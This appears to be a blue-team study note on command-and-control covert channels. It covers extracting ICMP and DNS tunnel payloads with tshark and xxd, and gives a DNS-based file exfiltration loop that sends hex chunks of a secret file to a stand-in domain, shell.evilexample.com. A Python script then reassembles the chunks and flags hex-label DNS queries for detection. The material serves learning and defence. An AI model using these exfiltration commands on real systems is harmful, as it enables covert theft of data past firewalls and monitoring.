Command and Control tricks
Practicing in Pretium lab (Blue Teams Lab/BTLO), I saw an infected machine communicating with C2 using ICMP (ping command). Below, some explanation about how to do it:
Source for both techniques: https://isc.sans.edu/diary/Packet+Tricks+with+xxd/10306
__________________________________________________________________________________________________________________________________________________________
1. Stripping headers and extracting data from a covert channel.
One method to establish a covert channel is to take the original packet, and wrap it into an encapsulating header. For example an ICMP or a DNS packet. The trick is to extract the payload, save it in a new file, and treat it as a new packet capture. The 'packetstan' blog [1] outlines one way to do so via scapy. But scapy is not as commonly installed and available as other tools like for example tshark (and well, xxd).
tshark can easily be used to extract the payload in hexadecimal format:
tshark -T fields -e data
To convert the hexadecimal payload into a binary file, just run it through xxd:
tshark -T fields -e data | xxd -r -p
The "-p" option will just accept a stream of hexadecimal data; without it, xxd expects the input to be encoded in the very specific format usually seen in xxd output.
______________________________________________________________________________________________________________________________________________________________
2. File transfer via DNS
Another nice idea I demoed in class is a file transfer via DNS that works without special tools. For pentesters, this is helpful as it will first of all sneak past many firewalls, and secondly you do not need to install any special tools that may be picked up by anti-malware.
This idea is along the lines of what is discussed in Kevin Bong's SANS Master's project [2].
First, we convert the file to be transferred via xxd into a hex stream.
xxd -p secret > file.hex
Next, we read each line from file.hex, and "transmit" it as a DNS query.
for b in `cat file.hex `; do dig $b.shell.evilexample.com; done
This does not need special privileges. On the DNS server, we can capture the messages via tcpdump or the query log.
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
Then, we extract the messages from the packet capture:
tcpdump -r /tmp/dns -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt
The "uniq" may not be necessary, but I find that the DNS messages may be resent once in a while if the response isn't fast enough.
Finally, just reverse the hex encoding:
xxd -r -p < received.txt > keys.pgp
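The defender's side of the DNS transfer above, as an added example (not code from these notes or from the ISC diary): reassemble the hex chunks from captured query names and flag zones receiving long pure-hex labels. It assumes `tcpdump -n` prints the queried name after "A? " (the SAMPLE_LOG lines are constructed) and uses a regex anchored on the zone instead of the positional `cut -f9`, which breaks when tcpdump adds flags to the line.

```python
import re
# Exfil zone from the page's example; each chunk is the leftmost label of a query for it.
EXFIL_ZONE = "shell.evilexample.com"

# Anchor on the zone rather than on a positional field like `cut -f9`, which
# shifts when tcpdump prints extra flags such as "[1au]".
QUERY_RE = re.compile(r"\s([0-9a-fA-F]{2,63})\." + re.escape(EXFIL_ZONE) + r"\.?\s")

# Detection heuristic (assumption, not from the page): a query whose leftmost
# label is long pure hex, under any zone. `xxd -p` emits 60 hex chars per line.
HEXLABEL_RE = re.compile(r"\?\s([0-9a-fA-F]{32,63})\.([A-Za-z0-9.-]+?)\.?\s")

# Constructed `tcpdump -n` output: two chunks, one retransmit, one benign query.
SAMPLE_LOG = [
    "12:00:01.000001 IP 10.0.0.5.41000 > 10.0.0.53.53: 1001+ A? "
    "54686520717569636b2062726f776e20666f78206a756d7073206f766572.shell.evilexample.com. (90)",
    "12:00:01.000100 IP 10.0.0.53.53 > 10.0.0.5.41000: 1001 NXDomain 0/1/0 (120)",
    "12:00:03.000002 IP 10.0.0.5.41000 > 10.0.0.53.53: 1001+ A? "
    "54686520717569636b2062726f776e20666f78206a756d7073206f766572.shell.evilexample.com. (90)",
    "12:00:03.200000 IP 10.0.0.5.41002 > 10.0.0.53.53: 1002+ A? www.example.com. (33)",
    "12:00:03.400000 IP 10.0.0.5.41003 > 10.0.0.53.53: 1003+ A? "
    "20746865206c617a7920646f672e0a.shell.evilexample.com. (60)",
]

def extract_chunks(lines):
    """Hex chunks sent to EXFIL_ZONE, in order, consecutive retransmits dropped."""
    chunks = []
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        label = m.group(1).lower()
        if len(label) % 2:                  # not a whole number of bytes
            continue
        if chunks and chunks[-1] == label:  # retransmit, same role as `uniq`
            continue
        chunks.append(label)
    return chunks

def reassemble(chunks):
    """Undo the `xxd -p` encoding, which is what `xxd -r -p` does."""
    return bytes.fromhex("".join(chunks))

def hex_label_zones(lines):
    """Zones that received queries with long pure-hex leftmost labels."""
    return {m.group(2).lower() for m in map(HEXLABEL_RE.search, lines) if m}

if __name__ == "__main__":
    print(reassemble(extract_chunks(SAMPLE_LOG)).decode(), hex_label_zones(SAMPLE_LOG))
```

Hex-looking labels also occur in legitimate traffic (some CDN and validation names), so treat the flagged zone list as a triage hint rather than a verdict.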